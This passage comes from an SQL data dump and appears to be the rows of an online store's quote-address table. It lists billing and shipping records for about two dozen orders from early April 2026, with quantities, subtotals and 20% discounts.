(1339, 853, '2026-04-01 12:55:31', '2026-04-01 12:55:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1340, 853, '2026-04-01 12:55:31', '2026-04-01 12:55:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1341, 854, '2026-04-01 12:55:36', '2026-04-01 12:55:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1342, 854, '2026-04-01 12:55:36', '2026-04-01 12:55:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1343, 855, '2026-04-01 12:55:41', '2026-04-01 12:55:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1344, 855, '2026-04-01 12:55:41', '2026-04-01 12:55:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1345, 856, '2026-04-01 12:55:47', '2026-04-01 12:55:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1346, 856, '2026-04-01 12:55:47', '2026-04-01 12:55:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1347, 857, '2026-04-01 12:55:52', '2026-04-01 12:55:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1348, 857, '2026-04-01 12:55:52', '2026-04-01 12:55:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1349, 858, '2026-04-01 14:26:28', '2026-04-01 14:26:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1350, 858, '2026-04-01 14:26:28', '2026-04-01 14:26:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 12.0000, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -1012.8000, -1012.8000, 4051.2000, 4051.2000, NULL, '[]', NULL, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1351, 859, '2026-04-01 15:26:28', '2026-04-01 15:26:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1352, 859, '2026-04-01 15:26:28', '2026-04-01 15:26:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1353, 860, '2026-04-01 16:38:25', '2026-04-01 16:38:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1354, 860, '2026-04-01 16:38:25', '2026-04-01 16:38:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1355, 861, '2026-04-01 18:50:57', '2026-04-01 18:50:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1356, 861, '2026-04-01 18:50:57', '2026-04-01 18:50:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1357, 862, '2026-04-01 23:08:53', '2026-04-01 23:08:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1358, 862, '2026-04-01 23:08:53', '2026-04-01 23:08:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1359, 863, '2026-04-02 00:53:09', '2026-04-02 00:53:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1360, 863, '2026-04-02 00:53:09', '2026-04-02 00:53:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1361, 864, '2026-04-02 01:02:01', '2026-04-02 01:02:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1362, 864, '2026-04-02 01:02:01', '2026-04-02 01:02:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 12.0000, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -1012.8000, -1012.8000, 4051.2000, 4051.2000, NULL, '[]', NULL, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1363, 865, '2026-04-02 03:49:45', '2026-04-02 03:49:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1364, 865, '2026-04-02 03:49:45', '2026-04-02 03:49:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1365, 866, '2026-04-02 07:06:30', '2026-04-02 07:06:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1366, 866, '2026-04-02 07:06:30', '2026-04-02 07:06:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1367, 867, '2026-04-02 11:42:11', '2026-04-02 11:42:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1368, 867, '2026-04-02 11:42:11', '2026-04-02 11:42:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1369, 868, '2026-04-02 13:31:21', '2026-04-02 13:31:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1370, 868, '2026-04-02 13:31:21', '2026-04-02 13:31:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1371, 869, '2026-04-02 15:10:23', '2026-04-02 15:10:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1372, 869, '2026-04-02 15:10:23', '2026-04-02 15:10:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1373, 870, '2026-04-02 19:56:17', '2026-04-02 19:56:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1374, 870, '2026-04-02 19:56:17', '2026-04-02 19:56:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1375, 871, '2026-04-02 23:01:14', '2026-04-02 23:01:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1376, 871, '2026-04-02 23:01:14', '2026-04-02 23:01:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1377, 872, '2026-04-03 01:49:15', '2026-04-03 01:49:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1378, 872, '2026-04-03 01:49:15', '2026-04-03 01:49:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1379, 873, '2026-04-03 06:29:57', '2026-04-03 06:29:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1380, 873, '2026-04-03 06:29:57', '2026-04-03 06:29:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1381, 874, '2026-04-03 07:49:04', '2026-04-03 07:49:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1382, 874, '2026-04-03 07:49:04', '2026-04-03 07:49:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1383, 875, '2026-04-03 10:31:02', '2026-04-03 10:31:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1384, 875, '2026-04-03 10:31:02', '2026-04-03 10:31:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
